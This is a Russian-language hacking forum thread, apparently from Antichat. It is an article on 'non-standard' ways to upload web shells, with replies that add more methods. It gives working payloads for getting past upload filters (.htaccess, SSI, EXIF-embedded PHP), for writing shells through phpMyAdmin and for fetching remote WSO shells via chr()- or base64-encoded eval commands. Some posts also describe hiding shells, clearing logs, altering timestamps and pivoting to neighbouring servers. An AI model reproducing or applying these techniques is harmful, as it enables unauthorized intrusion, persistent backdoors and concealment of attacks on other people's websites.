Нестандартные способы заливки шелла

Нестандартные способы заливки шелла​

Итак, сегодня мы будем разбирать несколько далеко не стандартных способов заливки шелла.

(В конце изложения имеются линки на видео к статье)

Шелл - оболочка операционной системы (от англ. shell — оболочка) — интерпретатор команд операционной системы, обеспечивающий интерфейс для взаимодействия пользователя с функциями системы.

Эту статью вам нужно читать в двух случаях:

1.) Для общего развития

2.) Если у вас не получается штатными методами залить шелл. (!!!)

Способ №1 - "Обход фильтрации"​

Допустим, формат .php не заливается, также .php2/.php3/.php4/.php5/ и даже .php.jpg/.php.abc.Варианты решения:

1.) Попробуйте залить .phtml - это также расширение семейства PHP.

2.) Создаём файлик .htaccess, и вписываем в него следующее:


AddType application/x-httpd-php.jpg

AddHandler application/x-httpd-php.jpg

Сохраним.. там, где .jpg можете указать любой понравившийся вам формат, хоть .hacker ( ).

Теперь попробуем залить наш .htaccess и вслед за ним шелл, с расширением, указанным в .htaccess'e

???

PROFIT!!!

Примечание: .htaccess - файл дополнительной конфигурации веб-сервера Apache, а также подобных ему серверов.

3.) Если методы выше не работают, то расскажу о очень интересном формате - ".shtml".


SSI (Server Side Includes — включения на стороне сервера) — несложный язык для динамической «сборки» веб-страниц на сервере из отдельных составных частей и выдачи клиенту полученного HTML-документа. Реализован в веб-сервере Apache при помощи модуля mod_include. Включённая в настройках по умолчанию веб-сервера возможность позволяет подключать HTML-файлы, поэтому для использования инструкций файл должен оканчиваться расширением .shtml, .stm или .shtm


Вся прелесть в том, что 95% администраторов либо вообще не знают что это такое, либо просто напросто забывают добавить этот формат в "чёрный список". А теперь советую поподробней прочитать, что это такое, залить такой файлик на сервер, и закачать шелл...

Также бывает, что если мы создадим файл file.shtm?cmd=... то в большинстве случаев скрипт не хотел выполнять системные команды, которые содержат пробел. т.е. "id" он выполнял, "ls" - тоже, а "uname -a" - нет, потому что содержит пробел. Таким образом все фишки типа "wget http://shell.com/shell.php" обламывались. Но не отчаиваетесь - выход есть:

Можно написать и скомпилировать програмку, которая выполняет системную команду скачивания шелла (через wget). скомпилировать, и залить её. Потом через SSI скрипт просто напросто выполнить её.

Код примера программы:


#include
#include

int main ()
{
system("wget [Путь_к_шеллу]");
return 0;
}

Код самый примитивный, описание команд:

System - команда для выполнения команд ( ) системного интерпретатора.

Wget - свободная не-интерактивная консольная программа для загрузки файлов по сети. Поддерживает протоколы HTTP, FTP и HTTPS, а также поддерживает работу через HTTP прокси-сервер. Программа включена почти во все дистрибутивы GNU/Linux

return - это то что мы "возвратим" программе, в данном случае ничего

include - подключение библиотек компилятора.

int main - главная "процедура" (наподобие функции) программы.

P.S Варианты shell.php.jpg тут не рассматриваются, т.к о них и так все знают.

(Спасибо Mailbrush'у за предоставленный вариант).

4.) Ну, а этот вариант - это использовать плагин на подобии "Tamper Data" (Firefox). Можно перехватить запрос, и изменить расширение, но такой метод самый маловероятный. Обычно он спасает в тех случаях, если php не разрешает какой-нибудь JavaScript.

5.) Пятый вариант - это отличный баг Windows, а именно, иногда сайт не разрешает закачивать PHP таким образом, что когда нажимаешь к примеру на кнопку "Обзор", то он показывает только файлы изображений, и т.п. Но не отчаивайтесь - просто нажмите на этот "Обзор" ( ) зайдите в директорию с шеллом, и наберите тут его имя:

http://i31.fastpic.ru/big/2011/1211/c9/44cabeff9d3cfdf6a0b55940549869c9.png

И нажмите "Открыть", шелл успешно откроется, и закачается

6.) Ну а этот метод не входит в "не стандартную" категорию, он заключается в том, что банальный создатель говорит, что разрешено дескать только .jpg и т.д, но на самом деле это не всегда так, достаточно залить PHP сценарий (шелл), и он будет отлично работать. Как вы поняли - никакой фильтрации нету полностью (ну или уж через чур кривая )

7.) А этот способ предложил нам |qbz|:


Например у нас есть какая-нить CMS-ка или даже просто самописный двиг, в котором где-то, куда-то иногда отправляются письма. Например, с активацией регистрации и так далее. Дело в том, что такие письма могут быть локально сохранены на nix-системах. Если рассматривать как пример форму активации аккаунта, то введем, например, как логин eval($_GET['c']); а как свое мыло впишем apache@localhost. Таким образом письмо будет отправлено на тот же демон хттпд и сохранено где-то в /var/mail с именем юзера хттпд. Думаю далее действия очевидны, имея, например, локальный инклуд мы можем прогрузить шелл инклудя письмецо с передачей кода загрузки шелла в параметре $_GET['c'].


То есть объясняя другими словами, вы в админке через отправку почты отправляете её на локальный хост, и это сохранится в "спец.папках", затем через уязвимость PHP Include мы инклудим этот файлик и таким образом можем воспроизвести PHP сценарий. Для домохозяек, PHP Include - это загрузка какого-либо файла (в нашем случае PHP скрипта) на страницу пользователя, как то так)) Подробнее можете погуглить....

8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:

Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:

Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть , сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...

Подробнее тут (https://antichat.live/showthread.php/p/3020118/)

Способ №2 - Хитрости PhpMyAdmin​

Допустим, вы получили доступ к PhpMyAdmin, и вам даже посчастливилось, что File_Priv=Y и Обновление таблиц тоже = Y. Тогда нажимает SQL (Может называться и по другому, и она сверху ). И вписываем следующее:


UPDATE `table_name` SET `column_name_1` = '' WHERE `column_name_2` =[Значение] LIMIT 1 ;
SELECT * FROM `table_name` WHERE `column_name_2` =[Значение] INTO OUTFILE '[Полный_путь_до_папки_с_прав� �ми_закачки_файла/shell.php]' ;

Запросы весьма банальны!

Первый запрос гласит о том, что мы изменяем (обновляем) колонку column_name_1 в таблице table_name, где column_name_2 = какому-либо значению.

Второй запрос "выдёргивает" данные из колонки column_name_2, находящейся в таблице table_name, и выдёргивает из той, где column_name_2 равен какому-либо значению, затем это логируется в какой-либо файл.

Теперь переходим по адресу


host.com/пут_до_той_папки_что_вы_указ али/shells.php

Пояснения:

table_name - имя таблицы в БД.

column_name_1 - эта колонка, которую мы будем "изменять".

column_name_2 - это колонка, например id, показывает, какую именно запись в БД мы будем редактировать. Например, column_name_2=id, а table_name=users. Это значит, что мы будем изменять запись в таблице users, где id=n (любое число).

Вы, вероятно обратили внимание, что весь php на одной строке и без пробелов, а это не случайность - это всё для вселюбимой PhpMyAdmin, если записать сюда код с переходами на другую строку, то он обязательно вставить "/" перед переходом, что соответственно вызовет ошибку в php скрипте. И ещё нельзя использовать ' ...

Также можно вместо:




Мы можем просто вписать:




Eval выполняет функции php, как вы видите, это мини шелл... используют так:


host.com/пут_до_той_папки_что_вы_указ али/shells.php?cmd=function_php;

Способ (Можно сказать, часть...) №3 - Что касается "Мини-шелла"​

Итак, опять же допустим, что вы закачали "мини шелл", но теперь бы вам надо залить нормальный, WSO к примеру.

Пробуем:


http://host.ru/shell.php?cmd=$url = "Ссылка_на_шелл.txt";$content = file_get_contents($url);$h = fopen("shells.php","w");$text = "$content";fwrite($h,$text);fclose($h);

Но тут очень часто бывает облом - либо нельзя, чтобы был пробел, либо нельзя, чтобы были кавычки. "Заброшу ка я сервер" - наверное подумали вы.. но нет, конечно, вы правы, чтобы задать тип переменной в php типа string, не мешало бы значение поместить в кавычки, а вот оказывается нет. Достаточно использовать функцию chr(); Эта функция "преобразовывает" ASCII в "обычный текст", таблицу таких символов можно взять тут - http://www.asciitable.com/

И соответственно, получаем код, к примеру (рабочий):

$url = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47 ).chr(47).chr(108).chr(101).chr(103).chr(105).chr( 111).chr(110).chr(101).chr(114).chr(115).chr(56).c hr(56).chr(46).chr(110).chr(97).chr(114).chr(111). chr(100).chr(46).chr(114).chr(117).chr(47).chr(101 ).chr(114).chr(114).chr(111).chr(114).chr(46).chr( 116).chr(120).chr(116);

Как видите, без кавычек, а тип будет String Так что теперь делаем код:


$url = chr(104).chr(116).chr(116).chr(112).chr(58).chr(47 ).chr(47).chr(108).chr(101).chr(103).chr(105).chr( 111).chr(110).chr(101).chr(114).chr(115).chr(56).c hr(56).chr(46).chr(110).chr(97).chr(114).chr(111). chr(100).chr(46).chr(114).chr(117).chr(47).chr(101 ).chr(114).chr(114).chr(111).chr(114).chr(46).chr( 116).chr(120).chr(116);$content = file_get_contents($url);$h = fopen(shells.chr(46).php,w);$text = $content;fwrite($h,$text);fclose($h);

И вставляем его в "?cmd=" и получаем в том же каталоге что и мини-шелл, настоящий, хороший шелл, который будет по адресу shells.php..

Заметка: Скорее всего, вы заметили, что у меня написано "shells.chr(46).php", а я объясню, 46 - это точка в "Dec", а имя файла у нас без кавычек, и если бы мы написали shells.php то он бы сохранился как shellsphp, то есть без расширения, т.к точка - это тоже функция в PHP, но я земенил её на shells.chr(46).php и получаем на выходе "shells.php". Вот так, удачи Вам!

Впринципе, можно сделать место функции chr() например так:


$url=$_GET[urlz]; $content= file_get_contents($url);$h=fopen($_GET[file],w);$text=$content;fwrite($h,$text);fclose($h);

И задавать так:


site.com/eval.php?cmd=$url=$_GET[url];$content= file_get_contents($url);$h=fopen($_GET[file],w);$text=$content;fwrite($h,$text);fclose($h);&url=url_загружаемого_файла&file=название_файла_на_выходе

В этом скрипте кстати тоже всё довольно просто


$url=$_GET[урл]


- это мы задаём значение переменной URL взятое из GET переменной URL.


$content= file_get_contents($url)


- тут мы присваиваем переменной Content значение документа, находящемся по адресу из переменной URL.


$h=fopen($_GET[file],w)


- открываем локальный файл $_GET[file] для записи.


$text=$content


- подставляем значение переменной text из переменной content.


fwrite($h,$text)


- записываем в файл, открытый для записи в переменной "h" значение из переменной text.


fclose($h)


- закрываем открытый файл из переменной h для записи в него текста.

Также такой код можно представить так:


fwrite(fopen($_GET[file],w),file_get_contents($_GET[переменная_с_урл]));fclose(fopen($_GET[file],w));


и юзать так:


http://site.ru/?url=LINK&file=FILE_NAME


А также, можно использовать Base64.​​

- Но ведь он оканчивается на "==" ??

спросите вы, но вот и нет, этот хвост можно убрать, и код продолжит также прекрасно работать!

например, PHPInfo() будет выглядеть так:




Урежем:




Видим, что всё работает)

теперь можем убрать кавычки, юзаем так:


site.ru/index.php?cmd=base64_decode(cGhwaW5mbygpOw);

Использовать кодировщик рекомендую тут http://base64.ru

или тут:

http://tools.0x0000ed.com/base64.php

Есть мини-шелл, но нету прав =(​​

Допустим, вы залили шелл, и напихали везде мини-шеллов, но ваш шелл потёрли, и урезали права во всех папках, либо другая причина, по которой вы не можете залить нормальный шелл из миника.

Для этого делаем так:

Идём сюда:

http://base64.ru/

Там вписываем такой код:


$content=file_get_contents("ПУТЬ_К_ШЕЛЛУ");$h=fopen("имя_файла_мини-шелла",w);$text=$content;fwrite($h,$text);fclose($h);

шифруем это в base64, у меня вышло так:


JGNvbnRlbnQ9ZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3 cuY29udGludXVtMi5jb20vd3NvLnR4dCIpOyRoPWZvcGVuKCJt ZW1iZXIuaW5jLnBocCIsdyk7JHRleHQ9JGNvbnRlbnQ7ZndyaX RlKCRoLCR0ZXh0KTtmY2xvc2UoJGgpOw

Тогда юзаем так:


http://site.ru/mini.php?cmd=eval(base64_decode(JGNvbnRlbnQ9ZmlsZV 9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuY29udGludXVtMi5j b20vd3NvLnR4dCIpOyRoPWZvcGVuKCJtZW1iZXIuaW5jLnBocC Isdyk7JHRleHQ9JGNvbnRlbnQ7ZndyaXRlKCRoLCR0ZXh0KTtm Y2xvc2UoJGgpOw));

теперь обновляем страничку с мини-шеллом, и видим полноценный шелл...

Окончание:

Это всего-лишь малая часть всех чудных способов не стандартной заливки, я просто попытался направить вас на тот путь, что выход есть всегда (почти ).

С уважением, Osstudio!

Подборка видео к статье:

"Заливка шелла через PhpMyAdmin. Из мини-шелла в WSO." (http://www.youtube.com/watch?v=bAK6juCSW_U&feature=youtu.be)

Эмм.. А я думал это и есть стандартные способы

скучно. все это уже давным давно есть на античате.


Видел не всё, что из этого следует - что всё разбито на куски, а я собрал всё воедино.

Отличная статья! Написано очень грамотно и методы актуальнейшие, сразу видно проффесионала в своей области! ТС пиши почаще...

актуальнее не бывает
простите, не удержался.


Методы действительно актуальные

А если вы располагаете новыми, прошу в ЛС на описание, добавим в статью

Методы действительно актуальные
А если вы располагаете новыми, прошу в ЛС на описание, добавим в статью


Есть еще один очень не стандартный метод - форма аплоада в панелях администрирования. Не плохо было бы написать статью...

ТС, запости это на рдоте, ок?

Эта сарказм или что, я не могу понять? Требую объяснений! Забаньте этого тролля кто-нибудь, модеры вы где?
А статья классная, видна рука мастера!!


да что ты заладил, рука мастера да рука мастера. аж читать противно.


Есть еще один очень не стандартный метод - форма аплоада в панелях администрирования. Не плохо было бы написать статью...


если это не стандартный метод, то какой по твоему стандартный?

загрузка шелла по фтп с одобрения админа что ли?

Эмм.. А я думал это и есть стандартные способы


Точно.

Заголовок, кстати, исправьте.

2.) Создаём файлик .htaccess, и вписываем в него следующее: ... Сохраняем ...


Ааа!! Сайт не работает!! Паника!! Я первый раз на ачат зашел, попробовал залить этот файлик, а потом все перестало работать!!

Лучше бы про это расписать. Такие примеры на ачате видел.

да что ты заладил, рука мастера да рука мастера. аж читать противно.


Противно читать - не читай. Я старался и убил несколько часов. Честно старался специально для Античата. И по твоему сообщению, "Актуальней не бывает" - разве, какой-то метод не рабочий? И не так просто найти подобную статью на античате, где уже всё есть в одном флаконе, зачем бедным юзерам рыть во всём форуме, в поисках нужной ему инфы? Как минимум, это уменьшит нагрузку на сервера

P.S Кстати, знаешь мне почему обидна критика к моей статье? Да потому-что почти все методы я сам придумал. Хоть они уже и были..

Так что рекомендую промолчать, новометоцец.

и убил несколько часов


На что?

P.s ТС, редко бывает черный список форматов, которые нельзя заливать. Скорее бывает "белый" список

На что?
P.s ТС, редко бывает черный список форматов, которые нельзя заливать. Скорее бывает "белый" список


На статью. Нет, очень даже не редко, если 2 раза хекал сайты, попробуй ещё, чтобы увидеть, чего нету, чего есть

Например эти редакторы сообщений в админке..

Интересная статья, много подчеркнул для себя

Ждем видео

Ждем видео


Сейчас записываю, как заливать шелл в PhpMyAdmin, причем, в боевых условиях.

P.S Кстати, знаешь мне почему обидна критика к моей статье? Да потому-что почти все методы я сам придумал.


тогда это целый научный труд

чтоб меня убили, пожарили и съели..

Сейчас записываю, как заливать шелл в PhpMyAdmin, причем, в боевых условиях.



Надеюсь, это хотя бы как минимум реализация unserialize-багов? Иначе, можешь остановиться прямо сейчас.

тогда это целый научный труд


Именно


Стандартные способы заливки шелла - это ..... ?


shell.php )) Возможно, я погорячился с названием

UPD: Сделал 1 видео, ссылка в конце статьи

Узнал новые вещи
спасибо за статью)


Думаю, скоро выложу видео по обходу фильтров, и хватит, т.к в первом видео я специально сразу шелл заливать не стал, а сначала мини-шелл, а уже затем, из него полноценный. Причём сразу с функцией chr();

С одной стороны, зная возраст ТС, как-то не хочется критиковать. Ведь это еще "начала", и на данном этапе у ТС ярко выражен энтузиазм и желание открыть что-то новое как для себя, так и для других.

Но с другой стороны меня всегда поражают люди (причем не с хорошей стороны), которые выходят танцевать на сцену, дабы показать зрителям их мастерство после недели-двух тренировок.

Думаю мысль моя ясна и понятна.

Я посмею дополнить топик еще одним способом, о котором знаю, а именно заливка шелла через обычное мыльное письмецо. Делается просто. Например у нас есть какая-нить CMS-ка или даже просто самописный двиг, в котором где-то, куда-то иногда отправляются письма. Например, с активацией регистрации и так далее. Дело в том, что такие письма могут быть локально сохранены на nix-системах. Если рассматривать как пример форму активации аккаунта, то введем, например, как логин eval($_GET['c']); а как свое мыло впишем apache@localhost. Таким образом письмо будет отправлено на тот же демон хттпд и сохранено где-то в /var/mail с именем юзера хттпд. Думаю далее действия очевидны, имея, например, локальный инклуд мы можем прогрузить шелл инклудя письмецо с передачей кода загрузки шелла в параметре $_GET['c'].

"Мини-шелл", - убило нах

Вообще, ТС, твой "мини-шелл" правильно называть бэк-дором.

И это есть стандартные методы заливки.

Если бы обьяснил как сделать инклуд бэк-дора в index.php к примеру, то статья заслужила бы название "не стандартные..."

Это все конечно хорошо, но обсуждалось уже 100500 раз, смотреть нужно по ситуации, что там есть чтобы залиться, не только же через админки льют. И про phpmyadmin тоже обсуждалось, и видео такое же снимали...

Дополнение тебе:

При неправильной конфигурации сервера если залить на сервер что то типа такого asdf.php.asdf, то есть вероятность что выполниться php. Потому как сервер будет сначала искать расширение asdf и после того как не найдет выполнит php. (могу конечно ошибаться с описанием, но такой способ у меня срабатывал несколько раз как на nix так и на windows серверах).

С одной стороны, зная возраст ТС, как-то не хочется критиковать. Ведь это еще "начала", и на данном этапе у ТС ярко выражен энтузиазм и желание открыть что-то новое как для себя, так и для других.
Но с другой стороны меня всегда поражают люди (причем не с хорошей стороны), которые
выходят танцевать на сцену
, дабы показать зрителям их мастерство после недели-двух тренировок.
Думаю мысль моя ясна и понятна.
Я посмею дополнить топик еще одним способом, о котором знаю, а именно заливка шелла через обычное мыльное письмецо. Делается просто. Например у нас есть какая-нить CMS-ка или даже просто самописный двиг, в котором где-то, куда-то иногда отправляются письма. Например, с активацией регистрации и так далее. Дело в том, что такие письма могут быть локально сохранены на nix-системах. Если рассматривать как пример форму активации аккаунта, то введем, например, как логин eval($_GET['c']); а как свое мыло впишем apache@localhost. Таким образом письмо будет отправлено на тот же демон хттпд и сохранено где-то в /var/mail с именем юзера хттпд. Думаю далее действия очевидны, имея, например, локальный инклуд мы можем прогрузить шелл инклудя письмецо с передачей кода загрузки шелла в параметре $_GET['c'].


За способ спасибо, обязательно добавлю. А на счёт опыта в погорячились.. спросите хоть у WinsTrooll'a , и он вам ответит, что работаем уже не первый год


"Мини-шелл", - убило нах
Вообще, ТС, твой "мини-шелл" правильно называть бэк-дором.
И это есть стандартные методы заливки.
Если бы обьяснил как сделать инклуд бэк-дора в index.php к примеру, то статья заслужила бы название "не стандартные..."


Такой вид шелла/бек-дора не раз назывался на хакслэнге мини-шеллом, так что споров тут быть не должно, кролик.


Это все конечно хорошо, но обсуждалось уже 100500 раз, смотреть нужно по ситуации, что там есть чтобы залиться, не только же через админки льют. И про phpmyadmin тоже обсуждалось, и видео такое же снимали...
Дополнение тебе:
При неправильной конфигурации сервера если залить на сервер что то типа такого asdf.php.asdf, то есть вероятность что выполниться php. Потому как сервер будет сначала искать расширение asdf и после того как не найдет выполнит php. (могу конечно ошибаться с описанием, но такой способ у меня срабатывал несколько раз как на nix так и на windows серверах).


Не замечал, чтобы это уж прямо ВСЁ обсуждалось 100500 раз, ведь когда-то сам искал, и найти не мог. А что касается "asdf.php.asd" - то это и есть самый банальный способ залития шелла, и все о нём знают.

Уберите либо "не" из заголовка, либо пробел после "не". Желательно первое.

За способ спасибо, обязательно добавлю. А на счёт опыта в погорячились.. спросите хоть у WinsTrooll'a , и он вам ответит, что работаем уже не первый год


Кто это? И если не первый год, ты в яслях начал что-ли хачить?

Кто это?
И если не первый год, ты в яслях начал что-ли хачить?


Кто это? да вот же /member.php?u=33917

Меня в яслях небыло.

Спасибо. Оформлено читабельно.

Видно что ТС старался, в написании и оформлении статьи.

Спасибо. Оформлено читабельно.
Видно что ТС старался, в написании и оформлении статьи.


Да, на этот раз много усилий приложил к оформлению.

Доп:

1.Вообще можно заевалить WSO без его физической загрузки на сервер. Для этого убираем Остальное заевалим таким способом:

http://site.ru/backdoor.php?cmd=eval(file_get_contents('http://url/ws.txt'));

2. Загрузка прямо из компьютера, евалим это:


echo"

Shell:

";

if(!empty($HTTP_POST_FILES['uploadfile']['name']))

{

@copy($HTTP_POST_FILES['uploadfile']['tmp_name'],

'./'.$HTTP_POST_FILES['uploadfile']['name']) ?

print'File '.$HTTP_POST_FILES['uploadfile']['name'].

' uploaded!
': print'Try...
'";

}

.

СПС тебе тс, критиковать все могут, а сами не то что статью, тупо помочь в чем то обламываются и ответить на вопросы новичков бояться, что если новичек узнает и начнет шарить в чем то то все их бизу конец

Доп:
1.Вообще можно заевалить WSO без его физической загрузки на сервер. Для этого убираем Остальное заевалим таким способом:
http://site.ru/backdoor.php?cmd=eval(file_get_contents('http://url/ws.txt'));
2. Загрузка прямо из компьютера, евалим это:

echo"

Shell:

";

if(!empty($HTTP_POST_FILES['uploadfile']['name']))

{

@copy($HTTP_POST_FILES['uploadfile']['tmp_name'],

'./'.$HTTP_POST_FILES['uploadfile']['name']) ?

print'File '.$HTTP_POST_FILES['uploadfile']['name'].

' uploaded!
': print'Try...
'";

}

.


"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?

Как было написано в статье, то почти всегда нельзя использовать кавычки, и поэтому я и использовать chr(); И без физ.загрузки это уже не "шелл на сервере", да и зачем такая сложная форма загрузки на сервер? в моей статье всё расписано, как проще сделать.


СПС тебе тс, критиковать все могут, а сами не то что статью, тупо помочь в чем то обламываются и ответить на вопросы новичков бояться, что если новичек узнает и начнет шарить в чем то то все их бизу конец




P.S И вообще, дорогие РОА, МОА, сами посмотрите, что кроме вас, которые это уже знают, есть очень много людей, которым это нужно.

Osstudio, а разница?)

Osstudio
, а разница?)


Смотря в чём

"eval(file_get_contents('http://url/ws.txt'));" зачем ты написал эвал, если cmd=... итак эвалится?


::facepalm::


Как было написано в статье, то почти всегда нельзя использовать кавычки, и поэтому я и использовать chr();


Открой для себя функции php. Начни со stripslashes().


чтобы задать тип переменной в php типа string, не мешало бы значение поместить в кавычки, а вот оказывается нет. Достаточно использовать функцию chr(); Эта функция "преобразовывает" ASCII в "обычный текст"


Да фиг с ними с функциями, тайна: данные с реквеста php и так принимает строковыми, а если бы он делал по другому случилось бы страшное безобразие, поверь мне. (только никому!!)

Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )

Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )


а смысл??? Они же все знают и ток писать что это паблик инфа могут, тс это писал для тех кто плохо в этом шарит и кому это будет нужно, а им как раз это вроде как и нах не надо

Ну а так в целом я думаю тс шарит нормально и он думаю был бы не против

::facepalm::
Открой для себя функции php. Начни со stripslashes().
Да фиг с ними с функциями, тайна: данные с реквеста php и так принимает строковыми, а если бы он делал по другому случилось бы страшное безобразие, поверь мне. (только никому!!)
Я бы на месте модератора РОА взял туда ТСа, что бы его посты не индексировались гуглом )


Согласен, тип string можно к примеру сделать так $a = (bla); , но ведь нельзя тогда использовать пробелы, спец.символы. что касается stripslashes() то какая разница, если пхп тупо выдаёт ошибку, если даже \' ??

А насчёт ::facepalm::, eval(eval) - на мой взгляд полный бред

Согласен, тип string можно к примеру сделать так $a = (bla); , но ведь нельзя тогда использовать пробелы, спец.символы.


ev=copy($_REQUEST[aa], $_REQUEST[bb]);&aa=http://site.ru/shell.php&bb=./shell.php


что касается stripslashes() то какая разница, если пхп тупо выдаёт ошибку, если даже \' ??








А насчёт ::facepalm::, eval(eval) - на мой взгляд полный бред


А это тебе домашнее задание )

ТС, скажи мне лучше как ты прячешь шеллы на сервере. Мне не для того, чтобы узнать, а просто интересно, что ты знаешь в данной области.

ТС, скажи мне лучше как ты прячешь шеллы на сервере. Мне не для того, чтобы узнать, а просто интересно, что ты знаешь в данной области.


1.) Беспалевное имя

2.) Запрячу в самом дальнем каталоге, где много фалов.

3.) Почищу логи

4.) Изменю дату создания файла

5.) Заодно делаю бинд порт, если удалят, он часто остаётся.

6.) Да и много ещё чего придумать можно. Также сначала рутаю, затем кидаю на соседние сервера, чтобы потом с них пробиться можно было, на соседах также выполняю пункты выше.

P.S А ты?

3.) Почищу логи


ого! каждый шелл = рут! гуру!

http://i64.servimg.com/u/f64/12/44/55/09/legend11.gif

P.S А ты?


Я не хакер. А вообще в отдельном файле хранить шелл по-моему не айс.

/threadnav264591-2-10.html

Я не хакер. А вообще в отдельном файле хранить шелл по-моему не айс.
/threadnav264591-2-10.html


Ну, тут согласен


ого! каждый шелл = рут! гуру!
http://i64.servimg.com/u/f64/12/44/55/09/legend11.gif


Не каждый, и вообще, это сообщение тебя не касалось.

Только разбанили, и опять за своё?

Ну, тут согласен
Не каждый, и вообще, это сообщение тебя не касалось.
Только разбанили, и опять за своё?


если бы оно меня не касалось, ты бы его написал в личку. а вообще твой пост выше - это чушь несусветная.


1.) Беспалевное имя


мы говорим о более-менее админах, а не о нубах, от которых вообще ничего прятать не нужно. и уж более-менее админ никогда не будет искать шелл по названию файла, а будет искать по содержимому, т.е. нашей основной задачей является скрытие функций, которые может заподозрить админ.


2.) Запрячу в самом дальнем каталоге, где много фалов.


тоже самое. для более-менее админов не будет играть роли раположение файла, т.к. искать он будет не в ручную перелистывая каталоги.


3.) Почищу логи


ну это лол чистой воды.


4.) Изменю дату создания файла


единственное адкеватное решение.


5.) Заодно делаю бинд порт, если удалят, он часто остаётся.


забинденый порт не имеет никакого отношения к сокрытию шелла. ну а в случае если ты делаешь бэкконект на свой комп (а ты 100% это делаешь)))), то комментарии излишни.


6.) Да и много ещё чего придумать можно. Также сначала рутаю, затем кидаю на соседние сервера, чтобы потом с них пробиться можно было, на соседах также выполняю пункты выше.


ну это вообще бред какой-то. речь шла о сокрытии шелла, а не о рутании. понятное дело, что получив доступ к серверу я могу делать что угодно, но таких условий не стояло.


P.S А ты?


а я дописываю строчку размером в 24 байта, в которой не содержится палевных функций в несколько файлов, меняю дату их создания и радуюсь.

если бы оно меня не касалось, ты бы его написал в личку. а вообще твой пост выше - это чушь несусветная.


#57 ?

Смотря в чём


Ты не понял? Ну и ладно...

P.S. Пора чистить топик...

4TC, /showthread.php?t=191917

если бы оно меня не касалось, ты бы его написал в личку. а вообще твой пост выше - это чушь несусветная.


Просто написали в теме, ответил тут же..


мы говорим о более-менее админах, а не о нубах, от которых вообще ничего прятать не нужно. и уж более-менее админ никогда не будет искать шелл по названию файла, а будет искать по содержимому, т.е. нашей основной задачей является скрытие функций, которые может заподозрить админ.


Естественно, вставляю что-то сперва, лицензию, к примеру


забинденый порт не имеет никакого отношения к сокрытию шелла. ну а в случае если ты делаешь бэкконект на свой комп (а ты 100% это делаешь)))), то комментарии излишни.


Нет, сначала подрубаюсь к дедику, затем уже ставлю на прослушку неткат, и уж затем подрубаюсь к основному.

[/QUOTE]

вот скажите, какой смысл нападать на тс?? что он написал что то не верное??? или обман?? или продает паблик? он сделал доброе дело для тех кто этого не знает, написал хорошую читабельную статью, ему надо сказать спс а не нападать, и он не обязан все что делает выкладывать в паблик, что посчитал нужным написать в статье то и сделал.

вот скажите, какой смысл нападать на тс?? что он написал что то не верное??? или обман?? или продает паблик? он сделал доброе дело для тех кто этого не знает, написал хорошую читабельную статью, ему надо сказать спс а не нападать, и он не обязан все что делает выкладывать в паблик, что посчитал нужным написать в статье то и сделал.


просто многим не нравится, что жеванные фекалии преподносят как новые конфетки.

просто многим не нравится, что жеванные фекалии преподносят как новые конфетки.


Преподнесли не тебе

Спасибо, все разжевано и доступно!

просто многим не нравится, что жеванные фекалии преподносят как новые конфетки.


просто автор сам еще новичок, более в глаза бросается именно это, отсюда и недовольство)

просто автор сам еще новичок, более в глаза бросается именно это, отсюда и недовольство)


Я не новичок я.. Средний

Вот еще один способ:

Например плагином Tamper Data для Mozilla Firefox.

Запускаешь перехват данных и пытаешься залить шелл, после чего жмешь вмешаться.

В ответ придет, что то вроде:


Код:
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
application/octet-stream
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n



Меняешь на:


Код:
------------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
image/jpeg
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n



И отправляешь.

/showpost.php?p=2344055&postcount=4

Так же можно воспользоваться этим, но только наоборот для сокрытия шелла, мы начинаем закачивать шелл на сайт(в формате .jpg)и после начала перехватываем запрос тампер датой и что то вроде:


------------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
image/jpeg
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n[


меняем на:


-----------------------------41184676334\r\n
Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n100000\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="uploaded"; filename="shell.php"\r\n
Content-Type:
application/octet-stream
\r\n\r\n\r\n
-----------------------------41184676334\r\n
Content-Disposition: form-data; name="Upload"\r\n\r\nUpload\r\n
-----------------------------41184676334--\r\n


и шелл в формате http://site.gov/images/logo.jpg исполняется как пхп файл в браузере

Только не начинайте гнобить...и ТСа тоже не гнобите, он наоборот молодец, а эту тему можно развивать и каждый будет вносить сюда свою лепту, частичку своего опыта и в скором будущем мы(сообщество античата)будем располагать огромными знаниями в этой области!

Вот еще один способ:
Например плагином Tamper Data для Mozilla Firefox.
